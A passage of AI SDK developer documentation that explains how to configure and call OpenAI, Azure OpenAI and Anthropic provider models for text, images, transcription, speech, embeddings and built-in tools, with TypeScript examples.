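For example, a minimal sketch that reads the revised prompt back from the metadata (the cast reflects the shape described above and is for illustration only):
import { openai } from '@ai-sdk/openai';
import { experimental_generateImage as generateImage } from 'ai';
const { image, providerMetadata } = await generateImage({
  model: openai.image('gpt-image-1'),
  prompt: 'A salamander at sunrise in a forest pond.',
});
const imageMetadata = providerMetadata?.openai?.images?.[0] as
  | { revisedPrompt?: string; size?: string; quality?: string }
  | undefined;
console.log(imageMetadata?.revisedPrompt);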
For more information on the available OpenAI image model options, see the OpenAI API reference.
Transcription Models
You can create models that call the OpenAI transcription API
using the .transcription() factory method.
The first argument is the model ID, e.g. whisper-1.
const model = openai.transcription('whisper-1');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.
import { experimental_transcribe as transcribe } from 'ai';
import { openai, type OpenAITranscriptionModelOptions } from '@ai-sdk/openai';
const result = await transcribe({
model: openai.transcription('whisper-1'),
audio: new Uint8Array([1, 2, 3, 4]),
providerOptions: {
openai: { language: 'en' } satisfies OpenAITranscriptionModelOptions,
},
});
To get word-level timestamps, specify the granularity:
import { experimental_transcribe as transcribe } from 'ai';
import { openai, type OpenAITranscriptionModelOptions } from '@ai-sdk/openai';
const result = await transcribe({
model: openai.transcription('whisper-1'),
audio: new Uint8Array([1, 2, 3, 4]),
providerOptions: {
openai: {
timestampGranularities: ['word'],
} satisfies OpenAITranscriptionModelOptions,
},
});
// Access word-level timestamps
console.log(result.segments); // Array of segments with startSecond/endSecond
The following provider options are available:
- timestampGranularities string[] - The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
- language string - The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
- prompt string - An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
- temperature number - The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
- include string[] - Additional information to include in the transcription response.
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper-1 | ✓ | ✓ | ✓ | ✓ |
| gpt-4o-mini-transcribe | ✓ | ✗ | ✗ | ✗ |
| gpt-4o-transcribe | ✓ | ✗ | ✗ | ✗ |
Speech Models
You can create models that call the OpenAI speech API
using the .speech() factory method.
The first argument is the model ID, e.g. tts-1.
const model = openai.speech('tts-1');
The voice argument can be set to one of OpenAI's available voices: alloy, ash, coral, echo, fable, onyx, nova, sage, or shimmer.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
voice: 'alloy', // OpenAI voice ID
});
You can also pass additional provider-specific options using the providerOptions argument:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai, type OpenAISpeechModelOptions } from '@ai-sdk/openai';
const result = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
voice: 'alloy',
providerOptions: {
openai: {
speed: 1.2,
} satisfies OpenAISpeechModelOptions,
},
});
- instructions string - Control the voice of your generated audio with additional instructions, e.g. "Speak in a slow and steady tone". Does not work with tts-1 or tts-1-hd. Optional.
- speed number - The speed of the generated audio. Select a value from 0.25 to 4.0. Defaults to 1.0. Optional.
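For example, with gpt-4o-mini-tts you can steer delivery via instructions:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai, type OpenAISpeechModelOptions } from '@ai-sdk/openai';
const result = await generateSpeech({
  model: openai.speech('gpt-4o-mini-tts'),
  text: 'Hello, world!',
  voice: 'alloy',
  providerOptions: {
    openai: {
      instructions: 'Speak in a slow and steady tone.',
    } satisfies OpenAISpeechModelOptions,
  },
});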
Model Capabilities
| Model | Instructions |
|---|---|
| tts-1 | ✗ |
| tts-1-hd | ✗ |
| gpt-4o-mini-tts | ✓ |
title: Azure OpenAI
description: Learn how to use the Azure OpenAI provider for the AI SDK.
Azure OpenAI Provider
The Azure OpenAI provider contains language model support for the Azure OpenAI chat API.
Setup
The Azure OpenAI provider is available in the @ai-sdk/azure module. You can install it with:
pnpm add @ai-sdk/azure
Provider Instance
You can import the default provider instance azure from @ai-sdk/azure:
import { azure } from '@ai-sdk/azure';
If you need a customized setup, you can import createAzure from @ai-sdk/azure and create a provider instance with your settings:
import { createAzure } from '@ai-sdk/azure';
const azure = createAzure({
resourceName: 'your-resource-name', // Azure resource name
apiKey: 'your-api-key',
});
You can use the following optional settings to customize the Azure OpenAI provider instance:
- resourceName string - Azure resource name. It defaults to the AZURE_RESOURCE_NAME environment variable. The resource name is used in the assembled URL: https://{resourceName}.openai.azure.com/openai/v1{path}. You can use baseURL instead to specify the URL prefix.
- apiKey string - API key that is being sent using the api-key header. It defaults to the AZURE_API_KEY environment variable.
- apiVersion string - Sets a custom API version. Defaults to v1.
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers. Either this or resourceName can be used. When a baseURL is provided, the resourceName is ignored. With a baseURL, the resolved URL is {baseURL}/v1{path}.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing (see the sketch after this list).
- useDeploymentBasedUrls boolean - Use deployment-based URLs for API calls. Set to true to use the legacy deployment format {baseURL}/deployments/{deploymentId}{path}?api-version={apiVersion} instead of {baseURL}/v1{path}?api-version={apiVersion}. Defaults to false. This option is useful for compatibility with certain Azure OpenAI models or deployments that require the legacy endpoint format.
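For example, a customized setup that logs requests through a custom fetch and opts into the legacy deployment-based URL format might look like this (a sketch; values are illustrative):
import { createAzure } from '@ai-sdk/azure';
const azure = createAzure({
  resourceName: 'your-resource-name',
  apiKey: 'your-api-key',
  useDeploymentBasedUrls: true, // use the legacy deployments/{deploymentId} URL format
  fetch: async (input, init) => {
    // log every request before delegating to the global fetch
    console.log('Azure OpenAI request:', input);
    return fetch(input, init);
  },
});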
Language Models
The Azure OpenAI provider instance is a function that you can invoke to create a language model:
const model = azure('your-deployment-name');
You need to pass your deployment name as the first argument.
Reasoning Models
Azure exposes the thinking of DeepSeek-R1 in the generated text using the <think> tag.
You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:
import { azure } from '@ai-sdk/azure';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const enhancedModel = wrapLanguageModel({
model: azure('your-deepseek-r1-deployment-name'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
Example
You can use OpenAI language models to generate text with the generateText function:
import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const { text } = await generateText({
model: azure('your-deployment-name'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
OpenAI language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
Provider Options
When using OpenAI language models on Azure, you can configure provider-specific options using providerOptions.openai. More information on the available configuration options is on the OpenAI provider page.
import { azure, type OpenAILanguageModelResponsesOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';
const messages = [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is the capital of the moon?',
},
{
type: 'image',
image: 'https://example.com/image.png',
providerOptions: {
openai: { imageDetail: 'low' },
},
},
],
},
];
const { text } = await generateText({
model: azure('your-deployment-name'),
messages,
providerOptions: {
openai: {
reasoningEffort: 'low',
} satisfies OpenAILanguageModelResponsesOptions,
},
});
Chat Models
You can create models that call the Azure OpenAI chat completions API using the .chat() factory method:
const model = azure.chat('your-deployment-name');
Azure OpenAI chat models also support some model-specific provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:
import { azure, type OpenAILanguageModelChatOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure.chat('your-deployment-name'),
prompt: 'Write a short story about a robot.',
providerOptions: {
openai: {
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
user: 'test-user', // optional unique user identifier
} satisfies OpenAILanguageModelChatOptions,
},
});
The following optional provider options are available for OpenAI chat models:
- logitBias Record<number, number> - Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase the likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the token from being generated.
- logprobs boolean | number - Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
- parallelToolCalls boolean - Whether to enable parallel function calling during tool use. Defaults to true.
- user string - A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Responses Models
Azure OpenAI uses the Responses API by default with the azure(deploymentName) factory method.
const model = azure('your-deployment-name');
Further configuration can be done using OpenAI provider options.
You can validate the provider options using the OpenAILanguageModelResponsesOptions type.
import { azure, type OpenAILanguageModelResponsesOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('your-deployment-name'),
providerOptions: {
azure: {
parallelToolCalls: false,
store: false,
user: 'user_123',
// ...
} satisfies OpenAILanguageModelResponsesOptions,
},
// ...
});
The following provider options are available:
- parallelToolCalls boolean - Whether to use parallel tool calls. Defaults to true.
- store boolean - Whether to store the generation. Defaults to true.
- metadata Record<string, string> - Additional metadata to store with the generation.
- previousResponseId string - The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
- instructions string - Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
- user string - A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
- reasoningEffort 'low' | 'medium' | 'high' - Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
- strictJsonSchema boolean - Whether to use strict JSON schema validation. Defaults to false.
The Azure OpenAI provider also returns provider-specific metadata:
For Responses models (azure(deploymentName)), you can type this metadata using AzureResponsesProviderMetadata:
import { azure, type AzureResponsesProviderMetadata } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('your-deployment-name'),
});
const providerMetadata = result.providerMetadata as
| AzureResponsesProviderMetadata
| undefined;
const { responseId, logprobs, serviceTier } = providerMetadata?.azure ?? {};
// responseId can be used to continue a conversation (previousResponseId).
console.log(responseId);
The following Azure-specific metadata may be returned:
- responseId string | null | undefined - The ID of the response. Can be used to continue a conversation.
- logprobs (optional) - Log probabilities of output tokens (when enabled).
- serviceTier (optional) - Service tier information returned by the API.
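For example, a sketch that continues a conversation by feeding the returned responseId back in as previousResponseId:
import { azure, type AzureResponsesProviderMetadata } from '@ai-sdk/azure';
import { generateText } from 'ai';
const first = await generateText({
  model: azure('your-deployment-name'),
  prompt: 'My name is Ada. Please remember it.',
});
const { responseId } = (
  first.providerMetadata as AzureResponsesProviderMetadata | undefined
)?.azure ?? {};
// responseId may be null or undefined, so check it before reusing it.
if (responseId) {
  const followUp = await generateText({
    model: azure('your-deployment-name'),
    prompt: 'What is my name?',
    providerOptions: {
      azure: { previousResponseId: responseId },
    },
  });
  console.log(followUp.text);
}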
Web Search Tool
The Azure OpenAI Responses API supports web search (preview) through the azure.tools.webSearchPreview tool.
const result = await generateText({
model: azure('gpt-4.1-mini'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search_preview: azure.tools.webSearchPreview({
// optional configuration:
searchContextSize: 'low',
userLocation: {
type: 'approximate',
city: 'San Francisco',
region: 'California',
},
}),
},
// Force web search tool (optional):
toolChoice: { type: 'tool', toolName: 'web_search_preview' },
});
console.log(result.text);
// URL sources from the result
const sources = result.sources;
for (const source of sources) {
console.log('source:', source);
}
File Search Tool
The Azure OpenAI provider supports file search through the azure.tools.fileSearch tool.
You can force the use of the file search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'file_search' }.
const result = await generateText({
model: azure('gpt-5'),
prompt: 'What does the document say about user authentication?',
tools: {
file_search: azure.tools.fileSearch({
// optional configuration:
vectorStoreIds: ['vs_123', 'vs_456'],
maxNumResults: 10,
ranking: {
ranker: 'auto',
},
}),
},
// Force file search tool:
toolChoice: { type: 'tool', toolName: 'file_search' },
});
Image Generation Tool
Azure OpenAI's Responses API supports multi-modal image generation as a provider-defined tool.
Availability is restricted to specific models (for example, gpt-5 variants).
import { createAzure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const azure = createAzure({
headers: {
'x-ms-oai-image-generation-deployment': 'gpt-image-1', // use your own image model deployment
},
});
const result = await generateText({
model: azure('gpt-5'),
prompt:
'Generate an image of an echidna swimming across the Mozambique channel.',
tools: {
image_generation: azure.tools.imageGeneration({ outputFormat: 'png' }),
},
});
for (const toolResult of result.staticToolResults) {
if (toolResult.toolName === 'image_generation') {
const base64Image = toolResult.output.result;
}
}
Code Interpreter Tool
The Azure OpenAI provider supports the code interpreter tool through the azure.tools.codeInterpreter tool. This allows models to write and execute Python code.
import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('gpt-5'),
prompt: 'Write and run Python code to calculate the factorial of 10',
tools: {
code_interpreter: azure.tools.codeInterpreter({
// optional configuration:
container: {
fileIds: ['assistant-123', 'assistant-456'], // optional file IDs to make available
},
}),
},
});
The code interpreter tool can be configured with:
- container: Either a container ID string or an object with fileIds to specify uploaded files that should be available to the code interpreter
PDF support
The Azure OpenAI provider supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';
import fs from 'node:fs';
const result = await generateText({
model: azure('your-deployment-name'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mediaType should be set to 'application/pdf'.
Typed providerMetadata in Text Parts
When using the Azure OpenAI Responses API, the SDK attaches Azure OpenAI-specific metadata to output parts via providerMetadata.
This metadata can be used on the client side for tasks such as rendering citations or downloading files generated by the Code Interpreter. To enable type-safe handling of this metadata, the AI SDK exports dedicated TypeScript types.
For text parts, when part.type === 'text', the providerMetadata is provided in the form of AzureResponsesTextProviderMetadata.
This metadata includes the following fields:
- itemId: The ID of the output item in the Responses API.
- annotations (optional): An array of annotation objects generated by the model. If no annotations are present, this property itself may be omitted (undefined). Each element in annotations is a discriminated union with a required type field. Supported types include, for example: url_citation, file_citation, container_file_citation, and file_path.
These annotations directly correspond to the annotation objects defined by the Responses API and can be used for inline reference rendering or output analysis. For details, see the official OpenAI documentation: Responses API – output text annotations.
import { azure, type AzureResponsesTextProviderMetadata } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('gpt-4.1-mini'),
prompt:
'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
tools: {
code_interpreter: azure.tools.codeInterpreter(),
web_search_preview: azure.tools.webSearchPreview({}),
file_search: azure.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
},
});
for (const part of result.content) {
if (part.type === 'text') {
const providerMetadata = part.providerMetadata as
| AzureResponsesTextProviderMetadata
| undefined;
if (!providerMetadata) continue;
const { itemId: _itemId, annotations } = providerMetadata.azure;
if (!annotations) continue;
for (const annotation of annotations) {
switch (annotation.type) {
case 'url_citation':
// url_citation is returned from web_search and provides:
// properties: type, url, title, start_index and end_index
break;
case 'file_citation':
// file_citation is returned from file_search and provides:
// properties: type, file_id, filename and index
break;
case 'container_file_citation':
// container_file_citation is returned from code_interpreter and provides:
// properties: type, container_id, file_id, filename, start_index and end_index
break;
case 'file_path':
// file_path provides:
// properties: type, file_id and index
break;
default: {
const _exhaustiveCheck: never = annotation;
throw new Error(
`Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
);
}
}
}
}
}
Typed providerMetadata in Reasoning Parts
When using the Azure OpenAI Responses API, reasoning output parts can include provider metadata.
To handle this metadata in a type-safe way, use AzureResponsesReasoningProviderMetadata.
For reasoning parts, when part.type === 'reasoning', the providerMetadata is provided in the form of AzureResponsesReasoningProviderMetadata.
This metadata includes the following fields:
- itemId: The ID of the reasoning item in the Responses API.
- reasoningEncryptedContent (optional): Encrypted reasoning content (only returned when requested via include: ['reasoning.encrypted_content']).
import {
azure,
type AzureResponsesReasoningProviderMetadata,
type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('your-deployment-name'),
prompt: 'How many "r"s are in the word "strawberry"?',
providerOptions: {
azure: {
store: false,
include: ['reasoning.encrypted_content'],
} satisfies OpenAILanguageModelResponsesOptions,
},
});
for (const part of result.content) {
if (part.type === 'reasoning') {
const providerMetadata = part.providerMetadata as
| AzureResponsesReasoningProviderMetadata
| undefined;
const { itemId, reasoningEncryptedContent } = providerMetadata?.azure ?? {};
console.log(itemId, reasoningEncryptedContent);
}
}
Typed providerMetadata in Source Document Parts
For source document parts, when part.type === 'source' and sourceType === 'document', the providerMetadata is provided as AzureResponsesSourceDocumentProviderMetadata.
This metadata is also a discriminated union with a required type field. Supported types include: file_citation, container_file_citation, and file_path. Each type includes the identifiers required to work with the referenced resource, such as fileId and containerId.
import {
azure,
type AzureResponsesSourceDocumentProviderMetadata,
} from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('gpt-4.1-mini'),
prompt:
'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
tools: {
code_interpreter: azure.tools.codeInterpreter(),
web_search_preview: azure.tools.webSearchPreview({}),
file_search: azure.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
},
});
for (const part of result.content) {
if (part.type === 'source') {
if (part.sourceType === 'document') {
const providerMetadata = part.providerMetadata as
| AzureResponsesSourceDocumentProviderMetadata
| undefined;
if (!providerMetadata) continue;
const annotation = providerMetadata.azure;
switch (annotation.type) {
case 'file_citation':
// file_citation is returned from file_search and provides:
// properties: type, fileId and index
// The filename can be accessed via part.filename.
break;
case 'container_file_citation':
// container_file_citation is returned from code_interpreter and provides:
// properties: type, containerId and fileId
// The filename can be accessed via part.filename.
break;
case 'file_path':
// file_path provides:
// properties: type, fileId and index
break;
default: {
const _exhaustiveCheck: never = annotation;
throw new Error(
`Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
);
}
}
}
}
}
Completion Models
You can create models that call the completions API using the .completion() factory method.
The first argument is the model id.
Currently only gpt-35-turbo-instruct is supported.
const model = azure.completion('your-gpt-35-turbo-instruct-deployment');
OpenAI completion models also support some model-specific settings that are not part of the standard call settings. You can pass them as provider options:
import {
azure,
type OpenAILanguageModelCompletionOptions,
} from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure.completion('your-gpt-35-turbo-instruct-deployment'),
prompt: 'Write a haiku about coding.',
providerOptions: {
openai: {
echo: true, // optional, echo the prompt in addition to the completion
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
suffix: 'some text', // optional suffix that comes after a completion of inserted text
user: 'test-user', // optional unique user identifier
} satisfies OpenAILanguageModelCompletionOptions,
},
});
The following optional provider options are available for Azure OpenAI completion models:
- echo boolean: Echo back the prompt in addition to the completion.
- logitBias Record<number, number>: Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use a tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
- logprobs boolean | number: Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
- suffix string: The suffix that comes after a completion of inserted text.
- user string: A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse.
Embedding Models
You can create models that call the Azure OpenAI embeddings API
using the .embedding() factory method.
const model = azure.embedding('your-embedding-deployment');
Azure OpenAI embedding models support several additional settings. You can pass them as provider options:
import { azure, type OpenAIEmbeddingModelOptions } from '@ai-sdk/azure';
import { embed } from 'ai';
const { embedding } = await embed({
model: azure.embedding('your-embedding-deployment'),
value: 'sunny day at the beach',
providerOptions: {
openai: {
dimensions: 512, // optional, number of dimensions for the embedding
user: 'test-user', // optional unique user identifier
} satisfies OpenAIEmbeddingModelOptions,
},
});
The following optional provider options are available for Azure OpenAI embedding models:
- dimensions number: The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
- user string: A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse.
Image Models
You can create models that call the Azure OpenAI image generation API (DALL-E) using the .image() factory method. The first argument is your deployment name for the DALL-E model.
const model = azure.image('your-dalle-deployment-name');
Azure OpenAI image models support several additional settings. You can pass them as providerOptions.openai when generating the image:
await generateImage({
model: azure.image('your-dalle-deployment-name'),
prompt: 'A photorealistic image of a cat astronaut floating in space',
size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
providerOptions: {
openai: {
user: 'test-user', // optional unique user identifier
responseFormat: 'url', // 'url' or 'b64_json', defaults to 'url'
},
},
});
Example
You can use Azure OpenAI image models to generate images with the generateImage function:
import { azure } from '@ai-sdk/azure';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: azure.image('your-dalle-deployment-name'),
prompt: 'A photorealistic image of a cat astronaut floating in space',
size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
});
// image contains the URL or base64 data of the generated image
console.log(image);
Model Capabilities
Azure OpenAI supports DALL-E 2 and DALL-E 3 models through deployments. The capabilities depend on which model version your deployment is using:
| Model Version | Sizes |
|---|---|
| DALL-E 3 | 1024x1024, 1792x1024, 1024x1792 |
| DALL-E 2 | 256x256, 512x512, 1024x1024 |
Transcription Models
You can create models that call the Azure OpenAI transcription API using the .transcription() factory method.
The first argument is the model id, e.g. whisper-1.
const model = azure.transcription('whisper-1');
Some deployments require the legacy, deployment-based URL format. You can enable it when creating the provider instance:
const azure = createAzure({
useDeploymentBasedUrls: true,
apiVersion: '2025-04-01-preview',
});
This uses the legacy endpoint format which may be required for certain Azure OpenAI deployments.
When using useDeploymentBasedUrls, the default api-version is not valid. You must set it to 2025-04-01-preview or an earlier value.
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.
import { experimental_transcribe as transcribe } from 'ai';
import { azure, type OpenAITranscriptionModelOptions } from '@ai-sdk/azure';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: azure.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
providerOptions: {
openai: {
language: 'en',
} satisfies OpenAITranscriptionModelOptions,
},
});
The following provider options are available:
- timestampGranularities string[]: The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
- language string: The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
- prompt string: An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
- temperature number: The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
- include string[]: Additional information to include in the transcription response.
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper-1 | ✓ | ✓ | ✓ | ✓ |
| gpt-4o-mini-transcribe | ✓ | ✗ | ✗ | ✗ |
| gpt-4o-transcribe | ✓ | ✗ | ✗ | ✗ |
Speech Models
You can create models that call the Azure OpenAI speech API using the .speech() factory method.
The first argument is your deployment name for the text-to-speech model (e.g., tts-1).
const model = azure.speech('your-tts-deployment-name');
Example
import { azure } from '@ai-sdk/azure';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const result = await generateSpeech({
model: azure.speech('your-tts-deployment-name'),
text: 'Hello, world!',
voice: 'alloy', // OpenAI voice ID
});
You can also pass additional provider-specific options using the providerOptions argument:
import { azure, type OpenAISpeechModelOptions } from '@ai-sdk/azure';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const result = await generateSpeech({
model: azure.speech('your-tts-deployment-name'),
text: 'Hello, world!',
voice: 'alloy',
providerOptions: {
openai: {
speed: 1.2,
} satisfies OpenAISpeechModelOptions,
},
});
The following provider options are available:
- instructions string: Control the voice of your generated audio with additional instructions, e.g. "Speak in a slow and steady tone". Does not work with tts-1 or tts-1-hd. Optional. (See the sketch after this list.)
- speed number: The speed of the generated audio. Select a value from 0.25 to 4.0. Defaults to 1.0. Optional.
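As a minimal sketch of the instructions option, assuming your deployment runs a model that supports it (the deployment name below is a placeholder):
import { azure, type OpenAISpeechModelOptions } from '@ai-sdk/azure';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const result = await generateSpeech({
  model: azure.speech('your-gpt-4o-mini-tts-deployment'), // placeholder deployment name
  text: 'Hello, world!',
  voice: 'alloy',
  providerOptions: {
    openai: {
      // per the option list above, instructions do not work with tts-1 / tts-1-hd
      instructions: 'Speak in a slow and steady tone',
    } satisfies OpenAISpeechModelOptions,
  },
});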
Model Capabilities
Azure OpenAI supports TTS models through deployments. The capabilities depend on which model version your deployment is using:
| Model Version | Instructions |
|---|---|
| tts-1 | ✗ |
| tts-1-hd | ✗ |
| gpt-4o-mini-tts | ✓ |
title: Anthropic
description: Learn how to use the Anthropic provider for the AI SDK.
Anthropic Provider
The Anthropic provider contains language model support for the Anthropic Messages API.
Setup
The Anthropic provider is available in the @ai-sdk/anthropic module. You can install it with
pnpm add @ai-sdk/anthropic
Provider Instance
You can import the default provider instance anthropic from @ai-sdk/anthropic:
import { anthropic } from '@ai-sdk/anthropic';
If you need a customized setup, you can import createAnthropic from @ai-sdk/anthropic and create a provider instance with your settings:
import { createAnthropic } from '@ai-sdk/anthropic';
const anthropic = createAnthropic({
// custom settings
});
You can use the following optional settings to customize the Anthropic provider instance:
- baseURL string: Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.anthropic.com/v1.
- apiKey string: API key that is being sent using the x-api-key header. It defaults to the ANTHROPIC_API_KEY environment variable. Only one of apiKey or authToken is required.
- authToken string: Auth token that is being sent using the Authorization: Bearer header. It defaults to the ANTHROPIC_AUTH_TOKEN environment variable. Only one of apiKey or authToken is required.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
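For example, a customized instance that routes requests through a proxy and attaches a custom header might look like this (a sketch; the URL and header values are placeholders):
import { createAnthropic } from '@ai-sdk/anthropic';

const anthropic = createAnthropic({
  baseURL: 'https://my-proxy.example.com/v1', // placeholder proxy URL
  apiKey: process.env.ANTHROPIC_API_KEY,
  headers: {
    'x-request-source': 'docs-example', // placeholder custom header
  },
});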
Language Models
You can create models that call the Anthropic Messages API using the provider instance.
The first argument is the model id, e.g. claude-3-haiku-20240307.
Some models have multi-modal capabilities.
const model = anthropic('claude-3-haiku-20240307');
You can also use the following aliases for model creation:
- anthropic.languageModel('claude-3-haiku-20240307') - Creates a language model
- anthropic.chat('claude-3-haiku-20240307') - Alias for languageModel
- anthropic.messages('claude-3-haiku-20240307') - Alias for languageModel
You can use Anthropic language models to generate text with the generateText function:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-3-haiku-20240307'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Anthropic language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
The following optional provider options are available for Anthropic models:
- disableParallelToolUse boolean: Optional. Disables the use of parallel tool calls. Defaults to false. When set to true, the model will only call one tool at a time instead of potentially calling multiple tools in parallel.
- sendReasoning boolean: Optional. Include reasoning content in requests sent to the model. Defaults to true. If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.
- effort "low" | "medium" | "high" | "xhigh" | "max": Optional. See the Effort section for more details.
- taskBudget object: Optional. See the Task Budgets section for more details.
- speed "fast" | "standard": Optional. See the Fast Mode section for more details.
- inferenceGeo "us" | "global": Optional. See the Data Residency section for more details.
- thinking object: Optional. See the Reasoning section for more details.
- toolStreaming boolean: Whether to enable tool streaming (and structured output streaming). Defaults to true.
- structuredOutputMode "outputFormat" | "jsonTool" | "auto": Optional. Determines how structured outputs are generated. "outputFormat" uses the output_format parameter to specify the structured output format; "jsonTool" uses a special "json" tool to specify the structured output format; "auto" uses "outputFormat" when supported and otherwise falls back to "jsonTool" (default).
- metadata object: Optional. Metadata to include with the request. See the Anthropic API documentation for details. Supports userId (string): an external identifier for the end-user. Should be a UUID, hash, or other opaque identifier. Must not contain PII.
Structured Outputs and Tool Input Streaming
Tool call streaming is enabled by default. You can opt out by setting the
